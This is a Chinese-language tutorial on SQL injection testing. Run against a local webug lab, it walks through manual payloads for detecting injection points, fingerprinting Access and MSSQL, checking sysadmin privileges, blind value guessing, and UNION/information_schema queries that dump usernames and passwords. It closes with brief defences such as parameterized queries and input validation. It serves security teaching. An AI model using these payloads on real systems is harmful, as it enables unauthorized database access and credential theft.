安全測試基礎-SQL注入詳解


1:什么是SQL注入

SQL注入是一種將SQL代碼插入或添加到應用(用戶)的輸入參數中的攻擊,之后再將這些參數傳遞給后台的SQL服務器加以解析並執行。

 www.xx.com/news.php?id=1
 www.xx.com/news.php?id=1 and 1=1

這里我們來理解一下SQL注入

首先,SQL注入常年蟬聯OWASP排行榜第一名

SQL注入產生的過程是怎樣的呢?見下圖

SQL注入的危害有哪些?

  數據庫信息泄露
  網頁篡改
  網站被掛馬
  數據庫被惡意操作
  服務器被遠程控制
  破壞硬盤數據

2: 學習一下sql注入的方法

2.1取消友好HTTP錯誤消息

一般通過遠程測試判斷是否存在SQL注入,所以通常沒有機會通過查看源代碼來復查注入的查詢結構。這導致經常需要通過推理來進行大量測試

   打開IE瀏覽器,選擇菜單“工具”->“Internet選項”對話框。
   打開“高級”選項卡,在設置列表中找到“瀏覽”組,
   取消勾選”顯示友好HTTP錯誤信息”復選框 。如下圖

2.2尋找SQL注入

最常用的SQL注入判斷方法,在網站中尋找如下形式的網頁

http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1

提交單引號,頁面返回錯誤

 

提交and 1=1 頁面返回正常 ,提交and 1=2 頁面返回錯誤

 

2.3確認注入點

區分數字和字符串
   數字型
   SELECT *FROM user WHERE id=1
   SELECT * FROM user WHERE id > 1
   帶引號類型的
   SELECT * FROM user WHERE name = ‘admin’
   SELECT * FROM user WHERE date > ‘2017-5-3’

內聯SQL注入:內聯注入是指插入查詢注入SQL代碼后,原來的查詢仍然會全部執行。

終止式SQL注入:終止式SQL語句注入是指攻擊者在注入SQL代碼時,通過注釋剩下的查詢來成功結束該語句

例如在單引號后面再加上 %23 表示進行單引號閉合,此時頁面又恢復正常

select * from XXX where id ='1"

select * from XXX where id = ' 1'%23  ' (藍色部分為注入內容,紅色部分為被注釋掉)

3:識別數據庫

3.1:數據庫連接運算符

 

www.xx.com/news.php?uid=admin
www.xx.com/news.php?uid=ad’+’min
www.xx.com/news.php?uid=ad’’min
www.xx.com/news.php?uid=ad||min

 

3.2 Access數據庫注入

利用內置數據庫表獲取數據庫類型

and (select count(*) from sysobjects)>=0
  Sysobjects為Mssql數據庫內置表
and (select count(*) from msysobjects)>=0
  Msysobjects為Access數據庫內置表

 

Access手工注入猜解

猜表名
   and exists(select * from 表名)
   and(select count(*) from 表名)>=0

猜字段名
   and exists(select 字段名 from 表名)
   and (select count(字段名) from 表名)>=0
猜字段長度
   and (select top 1 len(字段名) from 表名)>1
   and (select top 1 len(字段名) from 表名)>2
   and (select top 1 len(字段名) from 表名)>n

猜字段值
  and (select top 1 asc(mid (字段名,1,1)) from 表名)>0
  and (select top 1 asc(mid (字段名,1,1)) from 表名)>1
  and (select top 1 asc(mid (字段名,1,1)) from 表名)>n
  and (select top 1 asc(mid (字段名,2,1)) from 表名)>0
  and (select top 1 asc(mid (字段名,2,1)) from 表名)>2
  and (select top 1 asc(mid (字段名,2,1)) from 表名)>n

Order by 猜字段數目

  Order by 1
  Order by 2
  Order by n

Union select 獲取段內容
  Union select 1,字段名,2,…,n from 表名

 

3.3 Mssql數據庫注入

在進行MsSQL注入攻擊時,首先要對MsSQL注入點進行一下基本的注入檢查,以確定后面的攻擊實施方案。

注入點權限判斷
   and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判斷是否是系統管理員
   and 1=(select IS_SRVROLEMEMBER('db_owner')) //判斷是否是庫權限
   and 1=(select IS_SRVROLEMEMBER('public')) //判斷是否為public權限

返回信息判斷
   and @@version>0 //數據庫信息
   ;declare @d int //判斷MsSQL支持多行語句查詢
   and (select count(1) from [sysobjects])>=0 //是否支持子查詢
   and user>0 //獲取當前數據庫用戶名
   and 1=convert(int,db_name()) 或 1=(select db_name()) //當前數據庫名
   and 1=(select @@servername) //本地服務名
   and 1=(select HAS_DBACCESS('master')) //判斷是否有庫讀取權限

爆當前數據庫名
and db_name()=0
and db_name(n)>0

 

利用order by報錯法繼續進行攻擊,爆表名、字段名、字段內容
order by 10 //返回錯誤
order by 5 //返回錯誤
order by 4 //返回正確
 
證明該注入點處查詢字段數據為4。使用union select查詢數據庫的版本信息,以及連接的用戶名和數據庫
名等,提交如下鏈接:
union select 1,2,3,4

Information_schema結構
Information_schema結構包含數據庫關鍵信息
“SCHEMATA”表,用於存儲數據庫名,其中的關鍵字段為
SCHEMA_NAME,表示數據庫名稱
“TABLES”表,用於存儲表名。其中關鍵字段TABLE_SCHEMA表示表所屬的數據庫名稱;關鍵字段
TABLE_NAME表示表的名稱
”COLUMNS“表,用於存儲字段名。其中的關鍵字段TABLE_SCHEMA表示表所屬的數據庫名稱;字段
TABLE_NAME表示所屬的表的名稱;COLUMN_NAME表示字段名
 
爆出4張表
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database()

根據表名爆列名,可以獲取user表中所有的列

union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = 'user'

根據列名爆出所有關鍵用戶字段的信息

union select uname,pwd,3,4 from flag %23

 

4 注入工具介紹

 

5 防御sql注入

 

使用參數化查詢

PHP包含很多用於訪問數據庫的框架。訪問MySQL數據庫的mysqli包,PEAR::MDB2包(它替代了流行的PEAR::DB包)以及新的PHP數據對象(PDO)框架,他們均為使用參數化語句提供便利。

輸入驗證

驗證應用接收到的輸入時一種可用的功能強大的控制手段(如果用的好的話)。


白名單
   使用白名單應該開了下列要點:
   數據類型:字符、數字等;
   數據大小:字符串長度是否正確,數字的大小和精度是否正確。
   數據范圍:如果 是數字型,是否位於該數據類型期望的數字范圍。
   數據內容:數據是否屬於期望的數據類型,如手機號碼,它是否瞞住期望的值。
黑名單
   黑名單驗證的常用方法也是使用正則表達式。

編碼輸入與使用存儲過程防御

除了驗證應用受到的輸入以外,通常還需要對在應用的不同模塊或部分傳遞的內容進行編碼。

通常會被忽視的情況是對來自數據庫的信息進行編碼,尤其是當正在使用的數據庫未經過嚴格驗證或審查,或者來自第三方數據源時。

將應用設計成專門使用存儲過程來訪問數據庫是一種可以放置或減輕SQL注入影響的技術。存儲
過程是保存在數據庫匯總的程序。根據數據庫的不同,可以使用很多不同語言及其變體來編寫存儲過程

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM